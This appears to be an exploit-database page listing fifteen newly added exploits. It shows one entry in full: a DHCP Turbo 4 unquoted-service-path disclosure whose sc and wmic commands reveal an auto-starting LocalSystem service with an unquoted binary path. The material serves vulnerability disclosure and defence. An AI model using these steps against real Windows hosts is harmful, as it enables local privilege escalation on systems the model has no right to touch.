
15 changes to exploits/shellcodes HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path Cuckoo Clock v5.0 - Buffer Overflow Anviz CrossChex - Buffer Overflow (Metasploit) SOPlanning 1.45 - 'by' SQL Injection Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting Avaya Aura Communication Manager 5.2 - Remote Code Execution Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User) WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting SOPlanning 1.45 - Cross-Site Request Forgery (Add User) SOPlanning 1.45 - 'users' SQL Injection LabVantage 8.3 - Information Disclosure
26 lines
No EOL
1.1 KiB
Text
26 lines
No EOL
1.1 KiB
Text
Exploit Title: DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path
|
|
Exploit Author: boku
|
|
Date: 2020-02-10
|
|
Vendor Homepage: https://www.weird-solutions.com
|
|
Software Link: https://www.weird-solutions.com/download/products/dhcptv4_retail_IA32.exe
|
|
Version: 4.6.1298
|
|
Tested On: Windows 10 (32-bit)
|
|
|
|
C:\Users\user>sc qc "DHCP Turbo 4"
|
|
SERVICE_NAME: DHCP Turbo 4
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files\DHCP Turbo 4\dhcpt.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : DHCP Turbo 4
|
|
DEPENDENCIES : Nsi
|
|
: Afd
|
|
: NetBT
|
|
: Tcpip
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
C:\Users\user>wmic service get name, pathname, startmode | findstr "Turbo"
|
|
DisplayName PathName StartMode
|
|
DHCP Turbo 4 C:\Program Files\DHCP Turbo 4\dhcpt.exe Auto |